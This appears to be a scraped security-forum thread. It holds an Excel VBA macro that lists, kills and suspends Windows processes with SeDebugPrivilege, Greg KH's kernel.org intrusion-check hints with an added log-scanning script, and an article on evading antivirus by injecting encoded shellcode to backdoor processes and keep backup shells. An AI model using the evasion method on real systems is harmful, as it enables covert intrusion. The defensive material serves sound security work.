Private Declare Function GetProcessTimes Lib "kernel32" (ByVal hProcess As Long, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long
Private Declare Function FileTimeToLocalFileTime Lib "kernel32"
(lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long Private Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long Private Declare Function IsWow64Process Lib "kernel32" (ByVal hProcess As Long, ByRef Wow64Process As Long) As Long Private Declare Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO) Private Declare Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long Private Declare Function GetCurrentProcess Lib "kernel32" () As Long Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long #End If Private dicDevices As Dictionary Private Function StartsWith(ByVal strValue As String, ByVal strStartingValue As String) As Boolean StartsWith = Left(strValue, Len(strStartingValue)) = strStartingValue End Function Private Function EndsWith(ByVal strValue As String, ByVal strEndingValue As String) As Boolean EndsWith = Right(strValue, Len(strEndingValue)) = strEndingValue End Function Private Function GetProcessOwner(ByVal lProcessID As Long) As String #If Win64 Then Dim hProcess As LongPtr Dim hToken As LongPtr #Else Dim hProcess As Long Dim hToken As Long #End If Dim lAccountName As 
Long Dim lDomainName As Long Dim peUse As Long Dim lNeeded As Long Dim abBuffer() As Byte Dim lpSid As Long Dim lpString As Long Dim strAccountName As String Dim strDomainName As String GetProcessOwner = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If OpenProcessToken(hProcess, TOKEN_QUERY, hToken) <> 0 Then GetTokenInformation hToken, TokenUser, 0, 0, lNeeded ReDim abBuffer(0 To CLng(lNeeded)) If GetTokenInformation(hToken, TokenUser, abBuffer(0), UBound(abBuffer), lNeeded) = 1 Then CopyMemory lpSid, abBuffer(0), 4 strAccountName = Space(MAX_PATH) strDomainName = Space(MAX_PATH) lAccountName = MAX_PATH lDomainName = MAX_PATH If LookupAccountSid(vbNullString, lpSid, strAccountName, lAccountName, strDomainName, lDomainName, peUse) <> 0 Then If strDomainName = "" Then GetProcessOwner = Left(strAccountName, CLng(lAccountName)) Else GetProcessOwner = Left(strDomainName, CLng(lDomainName)) & "\" & Left(strAccountName, CLng(lAccountName)) End If End If End If Call CloseHandle(hToken) End If CloseHandle hProcess End If End Function Private Function GetTimes(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim sFTCreation As FILETIME Dim sFTDummy As FILETIME Dim sFTCreationLocal As FILETIME Dim sSTCreation As SYSTEMTIME GetTimes = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If GetProcessTimes(hProcess, sFTCreation, sFTDummy, sFTDummy, sFTDummy) <> 0 Then If FileTimeToLocalFileTime(sFTCreation, sFTCreationLocal) <> 0 Then If FileTimeToSystemTime(sFTCreationLocal, sSTCreation) <> 0 Then GetTimes = CStr(sSTCreation.wYear) + "/" + CStr(sSTCreation.wMonth) + "/" + CStr(sSTCreation.wDay) + " " + CStr(sSTCreation.wHour) + ":" + CStr(sSTCreation.wMinute) + ":" + CStr(sSTCreation.wSecond) End If End If End If CloseHandle hProcess End If End Function Private Function GetType(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr 
#Else Dim hProcess As Long #End If Dim lWoW64 As Long Dim sSI As SYSTEM_INFO GetType = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If IsWow64Process(hProcess, lWoW64) Then GetNativeSystemInfo sSI GetType = IIf(sSI.wProcessorArchitecture > 0 And lWoW64 = 0, "64", "32") End If CloseHandle hProcess End If End Function Private Function Device2DriveFilename(ByVal strFilename As String) As String Dim varKeyDevice As Variant Device2DriveFilename = strFilename For Each varKeyDevice In dicDevices.Keys If StartsWith(strFilename, varKeyDevice) Then Device2DriveFilename = dicDevices(varKeyDevice) & Mid(strFilename, Len(varKeyDevice) + 1) End If Next End Function Private Function GetProcessFilename(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim lLength As Long Dim strBuffer As String GetProcessFilename = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0, lProcessID) If hProcess <> 0 Then strBuffer = Space(MAX_PATH) Err.Clear On Error Resume Next lLength = GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) If Err.Number = 453 Then lLength = K32GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) End If On Error GoTo 0 GetProcessFilename = Device2DriveFilename(Left(strBuffer, CLng(lLength))) CloseHandle hProcess End If End Function Private Function GetDevices() As Dictionary Dim intIter As Integer Dim strBuffer As String Dim lLength As Long Dim dicDevices As Dictionary Set dicDevices = New Dictionary Set GetDevices = dicDevices For intIter = Asc("A") To Asc("Z") strBuffer = Space(MAX_PATH) lLength = QueryDosDevice(Chr(intIter) & ":", strBuffer, Len(strBuffer)) If lLength > 0 Then dicDevices.Add Left(strBuffer, InStr(strBuffer, vbNullChar) - 1), Chr(intIter) & ":" End If Next End Function Private Sub ProcessListToSheet(oCell) #If Win64 Then Dim hSnapshot As LongPtr #Else Dim hSnapshot As Long #End If Dim lRet As Long Dim sPE32 As 
PROCESSENTRY32 Dim strProcess As String Dim iIter As Integer Dim iColumn As Integer Dim iPositionNull As Integer AdjustTokenForDebug hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sPE32.dwSize = Len(sPE32) lRet = Process32First(hSnapshot, sPE32) iIter = oCell.Row iColumn = oCell.Column Do While lRet iPositionNull = InStr(1, sPE32.szExeFile, Chr(0)) If iPositionNull > 0 Then strProcess = Left(sPE32.szExeFile, iPositionNull - 1) Else strProcess = "" End If Cells(iIter, iColumn).Value = strProcess Cells(iIter, iColumn + 1).Value = sPE32.th32ProcessID Cells(iIter, iColumn + 2).Value = GetProcessFilename(sPE32.th32ProcessID) Cells(iIter, iColumn + 3).Value = GetProcessOwner(sPE32.th32ProcessID) Cells(iIter, iColumn + 4).Value = GetTimes(sPE32.th32ProcessID) Cells(iIter, iColumn + 5).Value = GetType(sPE32.th32ProcessID) iIter = iIter + 1 lRet = Process32Next(hSnapshot, sPE32) Loop CloseHandle hSnapshot End If End Sub Private Sub SuspendProcessByID(ByVal lProcessID As Long, ByVal bSuspend As Boolean) #If Win64 Then Dim hSnapshot As LongPtr Dim hThread As LongPtr #Else Dim hSnapshot As Long Dim hThread As Long #End If Dim lRet As Long Dim sTE32 As THREADENTRY32 hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sTE32.dwSize = Len(sTE32) lRet = Thread32First(hSnapshot, sTE32) Do While lRet If sTE32.rh32OwnerProcessID = lProcessID Then hThread = OpenThread(THREAD_SUSPEND_RESUME, False, sTE32.th32ThreadID) If hThread <> 0 Then If bSuspend Then SuspendThread hThread Else ResumeThread hThread End If CloseHandle hThread End If End If lRet = Thread32Next(hSnapshot, sTE32) Loop CloseHandle hSnapshot End If End Sub Private Sub TerminateProcessByID(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If hProcess = OpenProcess(PROCESS_TERMINATE, 0, lProcessID) If hProcess <> 0 Then TerminateProcess hProcess, 0 CloseHandle hProcess End 
If End Sub Private Sub ExecuteCommands(oCell) Dim iIter As Integer Dim iColumn As Integer AdjustTokenForDebug iIter = oCell.Row iColumn = oCell.Column Do While Cells(iIter, iColumn + 1).Value <> "" Select Case LCase(Cells(iIter, iColumn).Value) Case "t": TerminateProcessByID Cells(iIter, iColumn + 2).Value Case "s": SuspendProcessByID Cells(iIter, iColumn + 2).Value, True Case "r": SuspendProcessByID Cells(iIter, iColumn + 2).Value, False End Select iIter = iIter + 1 Loop End Sub Private Sub AdjustTokenForDebug() #If Win64 Then Dim hToken As LongPtr #Else Dim hToken As Long #End If Dim sTP As TOKEN_PRIVILEGES If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) <> 0 Then If LookupPrivilegeValue("", "SeDebugPrivilege", sTP.LuidUDT) <> 0 Then sTP.PrivilegeCount = 1 sTP.Attributes = SE_PRIVILEGE_ENABLED If AdjustTokenPrivileges(hToken, False, sTP, 0, ByVal 0&, ByVal 0&) <> 0 Then End If End If CloseHandle hToken End If End Sub Sub MacroProcessList() Range("A7:G65000").ClearContents Set dicDevices = GetDevices() ProcessListToSheet Range("B7") Range("A6:G65000").Sort "Process executable", xlAscending, header:=xlYes End Sub Sub MacroExecuteCommands() ExecuteCommands Range("A7") End Sub Sursa: http://blog.didierstevens.com/2011/10/15/taskmanager-runs-on-64-bit-excel/
  24. kernel.org status: hints on how to check your machine for intrusion

From: Greg KH <greg-AT-kroah.com>
To: Linux Kernel Mailing List <linux-kernel-AT-vger.kernel.org>
Subject: kernel.org status: hints on how to check your machine for intrusion

The compromise of kernel.org and related machines has made it clear that some developers, at least, have had their systems penetrated. As we seek to secure our infrastructure, it is imperative that nobody falls victim to the belief that it cannot happen to them. We all need to check our systems for intrusions. Here are some helpful hints as proposed by a number of developers on how to check to see if your Linux machine might be infected with something:

0. One way to be sure that your system is not compromised is to simply do a clean install; we can all benefit from a new start sometimes. Before reinstalling any systems, though, consider following the steps below to learn if your system has been hit or not.

1. Install the chkrootkit package from your distro repository and see if it reports anything. If your distro doesn't have the chkrootkit package, download it from:
   http://www.chkrootkit.org/
   Another tool is the ossec-rootcheck tool which can be found at:
   http://www.ossec.net/main/rootcheck
   And another one is the rkhunter program:
   http://www.rootkit.nl/projects/rootkit_hunter.html
   [Note, this tool has the tendency to give false-positives on some Debian boxes, please read /usr/share/doc/rkhunter/README.Debian.gz if you run this on a Debian machine]

2. Verify that your package signatures match what your package manager thinks they are. To do this on a rpm-based system, run the following command:
   rpm --verify --all
   Please read the rpm man page for information on how to interpret the output of this command.
   To do this on a Debian based system, run the following bash snippet:
   dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n; fi; done > ~/tmp.txt
   for f in `cat ~/tmp.txt`; do debsums -s -a $f; done
   If you have a source-based system (Gentoo, LFS, etc.) you presumably know what you are doing already.

3. Verify that your packages are really signed with the distro's keys. Here's a bash snippet that can do this on a rpm based system to verify that the packages are signed with any key, not necessarily your distro's key. That exercise is left for the reader:
   for package in `rpm -qa`; do
       sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package`
       if [ -z "$sig" ] ; then
           # check if there is a GPG key, not a PGP one
           sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package`
           if [ -z "$sig" ] ; then
               echo "$package does not have a signature!!!"
           fi
       fi
   done
   Unfortunately there is no known way of verifying this on Debian-based systems.

4. To replace a package that you find suspect, uninstall it and install it anew from your distro. For example, if you want to reinstall the ssh daemon, you would do:
   $ /etc/init.d/sshd stop
   rpm -e openssh
   zypper install openssh    # for openSUSE based systems
   yum install openssh       # for Fedora based systems
   Ideally do this from a live cdrom boot, using the 'rpm --root' option to point rpm at the correct location.

5. From a liveCD environment, look for traces such as:
   a. Rogue startup scripts in /etc/rc*.d and equivalent directories.
   b. Strange directories in /usr/share that do not belong to a package. This can be checked on an rpm system with the following bash snippet:
      for file in `find /usr/share/`; do
          package=`rpm -qf -- ${file} | grep "is not owned"`
          if [ -n "$package" ] ; then
              echo "weird file ${file}, please check this out"
          fi
      done

6. Look for mysterious log messages, such as:
   a. Unexpected logins in wtmp and /var/log/secure*, quite possibly from legitimate users from unexpected hosts.
   b. Any program trying to touch /dev/mem.
   c. References to strange (non-text) ssh version strings in /var/log/secure*. These do not necessarily indicate *successful* breakins, but they indicate *attempted* breakins which means your system or IP address has been targeted.

7. If any of the above steps show possible signs of compromise, you should investigate further and identify the actual cause. If it becomes clear that the system has indeed been compromised, you should certainly reinstall the system from the beginning, and change your credentials on all machines that this machine would have had access to, or which you connected to through this machine. You will need to check your other systems carefully, and you should almost certainly notify the administrators of other systems to which you have access.

Finally, please note that these hints are not guaranteed to turn up signs of a compromised system. There are a lot of attackers out there; some of them are rather more sophisticated than others. You should always be on the alert for any sort of unexpected behavior from the systems you work with.

thanks,

greg k-h

Source: kernel.org status: hints on how to check your machine for intrusion [LWN.net]
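As an added example that is not part of Greg's mail: a small Python checker for the three step-6 indicators (logins from outside the networks you expect, programs touching /dev/mem, and non-text ssh version strings), run over constructed auth-log lines. The host name devbox, the trusted network 10.0.0.0/24 and every log line are made up for the demonstration; the message formats follow what OpenSSH and the Linux kernel actually log.

```python
import ipaddress
import re
from typing import Dict, Iterable, List, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]

# Step 6a: successful ssh logins; flagged when the source is outside the trusted networks.
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port \d+"
)
# Step 6b: the kernel's message when a program opens /dev/mem (devmem_is_allowed).
DEVMEM_RE = re.compile(r"tried to access /dev/mem")
# Step 6c: sshd's log line for a client banner that is not an SSH version string.
BADVER_RE = re.compile(
    r"Bad protocol version identification '(?P<ident>.*)' from (?P<src>\S+)"
)
# "Non-text": a byte outside printable ASCII, or a syslog escape (\xNN or \NNN) for one.
NONTEXT_RE = re.compile(r"[^\x20-\x7e]|\\x[0-9a-fA-F]{2}|\\[0-7]{3}")


def src_is_trusted(src: str, nets: List[Network]) -> bool:
    """True when src is an IP address inside one of nets; hostnames are never trusted."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in nets)


def scan_lines(lines: Iterable[str], trusted_cidrs: Iterable[str]) -> Dict[str, List[str]]:
    """Group the log lines that match one of the step-6 indicators by indicator name."""
    nets = [ipaddress.ip_network(c, strict=False) for c in trusted_cidrs]
    hits: Dict[str, List[str]] = {
        "unexpected_login": [],
        "dev_mem": [],
        "nontext_ssh_version": [],
    }
    for raw in lines:
        line = raw.rstrip("\n")
        m = ACCEPTED_RE.search(line)
        if m and not src_is_trusted(m.group("src"), nets):
            hits["unexpected_login"].append(line)
            continue
        if DEVMEM_RE.search(line):
            hits["dev_mem"].append(line)
            continue
        m = BADVER_RE.search(line)
        if m and NONTEXT_RE.search(m.group("ident")):
            hits["nontext_ssh_version"].append(line)
    return hits


def scan_file(path: str, trusted_cidrs: Iterable[str]) -> Dict[str, List[str]]:
    """Same check over a real file such as /var/log/secure; undecodable bytes are kept."""
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        return scan_lines(fh, trusted_cidrs)


# Constructed sample: two expected logins, one login from an outside address, one
# /dev/mem access, one binary banner (TLS ClientHello bytes) and one plain-text banner
# (a stray HTTP request) that the non-text rule deliberately leaves alone.
SAMPLE_LOG = """\
Oct 15 10:01:02 devbox sshd[2101]: Accepted publickey for alice from 10.0.0.12 port 51022 ssh2
Oct 15 10:05:44 devbox sshd[2144]: Accepted password for alice from 203.0.113.77 port 40012 ssh2
Oct 15 10:07:10 devbox kernel: Program dumper tried to access /dev/mem between 10000->20000.
Oct 15 10:09:31 devbox sshd[2201]: Bad protocol version identification '\\x16\\x03\\x01\\x00\\xc5' from 198.51.100.9
Oct 15 10:09:32 devbox sshd[2202]: Bad protocol version identification 'GET / HTTP/1.1' from 10.0.0.13
Oct 15 10:12:00 devbox sshd[2250]: Accepted publickey for bob from 10.0.0.15 port 51100 ssh2
"""

# Constructed: the one network this developer expects to log in from.
TRUSTED = ["10.0.0.0/24"]

if __name__ == "__main__":
    for kind, found in scan_lines(SAMPLE_LOG.splitlines(), TRUSTED).items():
        print(f"{kind}: {len(found)} hit(s)")
        for entry in found:
            print("    " + entry)
```

Point scan_file at /var/log/secure (or auth.log) with your own office and VPN ranges; a hit is a lead to investigate under step 7, not proof of compromise.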
  25. Bypassing Anti-virus using Code Injection Technique

Author: Amit Malik aka DouBle_Zer0

Contents
- Introduction
- Antivirus
- Executables
- PEview
- Encrypter/packer/protector
- The Concept of Injector
- Video Demonstration
- Download Injector
- References

Introduction

This article throws light on how the 'Code Injection' or 'DLL Injection' technique can be used as a prominent weapon along with other techniques to bypass Anti-virus software. It also explains top-level technical details revolving around EXE internals, protectors/packers, encoded shellcodes, the inner working of Antivirus etc. Accompanying this article, you will find a video demonstration of 'Injector (POC Tool)' which shows the code injection technique successfully bypassing Antivirus software on the system.

Antivirus

Antivirus (or anti-virus) software is used to prevent, detect, and remove malware, including computer viruses, worms, and Trojan horses. Such programs may also prevent and remove adware, spyware, and other forms of malware. @ Wikipedia

Antivirus plays a major role in the security of a system. But for hackers/pentesters, it creates some big problems. During the post exploitation phase we have some sort of access on the victim machine and generally we want to upload some tools on the victim machine for better control, but here antivirus plays with our tools, detects them as malicious files and deletes them. Now it may be possible that if you are using your own tool then antivirus may fail to detect it, but this is a rare situation during a pentest. In case we use publicly exposed tools then there is a higher probability of getting caught by antivirus.

A simple example: Suppose we have a reverse shell. Now we know that this is a single connection to our machine from our victim and we don't want to lose it at any condition. So we upload some tools on the victim machine like netcat or another executable (maybe generated from metasploit) to get a backup connection etc., maybe to upgrade our shell to a meterpreter shell. But our victim is using an anti virus and the anti virus deletes the uploaded files. Now we need something else, meaning either bypass AV or write our own code. But the question here is how antivirus is able to detect our executables (.exe).

Executables (.EXE)

Basically exe files not only contain your code but also contain some important data that is only meaningful for an Operating system loader. And the technical name for that data is the PE (portable executable) file header / PE file format. I am not explaining the pe file format here. Here is the snapshot: PEview - PE File Viewer Tool. So when we execute an exe, the windows loader first reads the PE header and on the basis of the header information the loader loads the file into memory.

Executable Detection (top level view): So when we copy the file on the system then antivirus scans the file (checks for known signatures) and if the file is malicious then deletes the file.

Encrypter/packer/protector

The above technologies (Encrypter/packer/protector) are not only to evade anti viruses. People also use them for ethical work. Basically encryptors/packers encrypt/pack the file and add the decryption/unpacking routine into the file. So when we execute the file the windows loader loads the file on the basis of the PE header (encryptor/packer does not pack the PE header of a file, they only change the necessary values in the PE header, e.g. Address of entry point, sections etc.). So the unpacking works something like this: the unpacking/decryption routine unpacks the code and then jumps to the Original Entry Point (on our real code freshly recovered from the unpacking routines).

So if we pack the exe with any packer then Antivirus should not be able to detect the exe? Ok, now it's time to do some practical. Pack any malicious file with UPX (a freeware packer) and then test again with Antivirus. You should see that your AV is again popping up the alert and telling you: hey, don't try to fool me, it is malicious. But our file was packed; how does AV still know that it is a malicious file? And the answer is AV also has a signature for UPX, so what AV is doing is it loads the file, detects the packer, then decrypts/unpacks the file (AV also knows how to unpack UPX packed files) and then tests the file. And this is the reason that AV still knows that the file is malicious. But hey, where is the proof that AV is doing all this shit to test the file? Ok, to prove it just open the same packed file in a hex editor and just overwrite the starting bytes with some garbage values and then again test it with your AV. Now you should see that AV is saying that the file is clean (Reason: because the file is corrupted and AV has no option to unpack/decrypt it). Fantastic, that's all we want.

Concept of Code Injection - a generic way to bypass AV

Because exe files are going to be detected by AVs (at least if you pack them with the publicly exposed packers/encryptors), we have to think in another way. And the other way is: split the exe into two parts (not physically):
- The core code (the actual code that performs a specific task, e.g. bind shell)
- The interface - a mechanism that will inject the code into memory and execute that code.

So the functioning is something like this: note that from the above explanation we know that shellcode/code in a file is not going to be detected by AV because AV doesn't know how to decode shellcode. (Don't talk about Heuristics, I know AV vendors are joking.)

Important Note: you may be thinking why I am saying encoded shellcode; because if you use metasploit shellcodes their signatures may be in AVs. If you encode the shellcode with any available encoder in metasploit then AVs are not able to decode it in a file and not able to detect it (if you don't understand it read the whole stuff again). Although in some cases (e.g. Avast, maybe with others also) AV doesn't alert if you use shellcodes that are not encoded because AV thinks that txt files are lame files. But if you forcefully scan the file then AV alerts.

The second part of the concept is the interface that will inject the code into a process. Code injection is not a new concept (dll injection is one of the most popular examples).

Note: All the things are generic and are not specific to any tool or shellcodes. Metasploit and shellcodes are used only to demonstrate the concept. You can also inject your codes "that are detectable to AV in exe mode" with this method and can bypass AV.

Things that you can do with this method:
- Can backdoor a process
- Can provide many backup shells (every type)
- We can use publicly available tools (malicious) without fear
- and too many other things limited to your wild imagination.

Download Injector

You can click on the below link to download the source code and executable for the Injector - Proof of Concept code.
http://securityxploded.net/download/Injector.rar

Source and video demo: Bypassing Anti-virus using Code Injection Technique | www.SecurityXploded.com